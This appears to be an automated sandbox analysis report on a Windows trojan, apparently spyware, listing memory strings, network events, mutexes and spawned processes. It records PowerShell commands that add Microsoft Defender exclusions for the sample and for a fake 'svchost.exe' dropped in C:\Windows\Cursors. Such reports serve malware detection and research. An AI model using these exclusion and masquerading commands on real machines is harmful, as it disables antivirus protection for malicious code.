                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s615/0_GettyImages-1302496803.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://mab.data.tm-awx.com/rhs&quot;
                      Source: lfQuSBwdSf.exe, 00000000.00000002.345654171.00000000030F0000.00000004.00000001.sdmpString found in binary or memory: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal
                      Source: lfQuSBwdSf.exe, 00000000.00000002.345654171.00000000030F0000.00000004.00000001.sdmpString found in binary or memory: https://myliverpoolnews.cf4&l
Source: powershell.exe, 00000005.00000002.536067747.00000000058E2000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.535279406.0000000005E25000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp | String found in binary or memory: https://quantcast.mgr.consensu.org
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://reachplc.hub.loginradius.com&quot;
Source: lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp | String found in binary or memory: https://s2-prod.liverpool.com
Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp | String found in binary or memory: https://s2-prod.liverpool.com/
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://s2-prod.mirror.co.uk/
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://static.hotjar.com/c/hotjar-
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://trinitymirror.grapeshot.co.uk/
Source: lfQuSBwdSf.exe, 00000000.00000002.340683009.0000000001392000.00000004.00000020.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp | String found in binary or memory: https://www.google-analytics.com
Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp | String found in binary or memory: https://www.googletagmanager.com
Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M3TH25P
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/all-about/champions-league
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/all-about/curtis-jones
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/all-about/georginio-wijnaldum
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/all-about/mohamed-salah
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/all-about/premier-league
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/all-about/transfers
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
Source: lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
Source: lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
Source: lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
Source: lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
Source: lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
Source: lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/featuresnC
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/schedule/
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/search/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe | File created: C:\Windows\Cursors\WQzhTjfBsYrOnkh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_030DD4A1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_030DD4B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0795B7B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0795B7C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0337E870
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_03370040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_03372E20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0337E870
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0337E870
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_03372E20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_03372E20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_03372E20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_03372E20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_08016D78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_080165A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0801A800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_08010040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0801A330
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_08014520
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_08014E88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_080196B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_08050830
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0805E330
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_080B7E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_080BF500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_080B7E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_03378EAB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_02B98298
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_02B98790
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_02B99F40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_02B9C338
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_02B991E7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_02B9E170
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_02B9A770
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_02B9C338
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_02B9C8C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_02B96D28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_02B96D19
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_0787CEE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_0787B6F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_0787F2AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_0787DA51
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_0787CED1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_07874568
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_078733D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_07876375
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_07874A20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_078BDF90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_078B65A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_078B6D78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_078B9DC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_078B4510
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_078B92B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_078BA0B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_078B0040
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe | Code function: 17_2_05D12207
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe | Code function: 17_2_05D128B8
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe | Code function: 17_2_05D1AA4A
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 2300
Source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs lfQuSBwdSf.exe
Source: lfQuSBwdSf.exe, 00000000.00000002.343066638.00000000016B0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dllj% vs lfQuSBwdSf.exe
Source: lfQuSBwdSf.exe, 00000000.00000002.332211972.0000000000CBA000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameDimbono.exe0 vs lfQuSBwdSf.exe
Source: lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs lfQuSBwdSf.exe
Source: lfQuSBwdSf.exe, 00000000.00000003.233052710.0000000003358000.00000004.00000001.sdmp | Binary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs lfQuSBwdSf.exe
Source: lfQuSBwdSf.exe, 00000000.00000002.343141674.00000000016C0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs lfQuSBwdSf.exe
Source: C:\Windows\System32\svchost.exe | Section loaded: userdatalanguageutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
                      Source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb,
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@49/25@11/5
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile created: C:\Users\user\WrdAHTtKmtDmucJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5136:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2788
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5224:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2120:120:WilError_01
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wacrv0pl.app.ps1Jump to behavior
                      Source: lfQuSBwdSf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: lfQuSBwdSf.exe Virustotal: Detection: 24%
                      Source: lfQuSBwdSf.exe ReversingLabs: Detection: 29%
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe File read: C:\Users\user\Desktop\lfQuSBwdSf.exe:Zone.Identifier
                      Source: unknown Process created: C:\Users\user\Desktop\lfQuSBwdSf.exe 'C:\Users\user\Desktop\lfQuSBwdSf.exe'
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lfQuSBwdSf.exe' -Force
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknown Process created: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe'
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe Process created: C:\Users\user\Desktop\lfQuSBwdSf.exe C:\Users\user\Desktop\lfQuSBwdSf.exe
                      Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
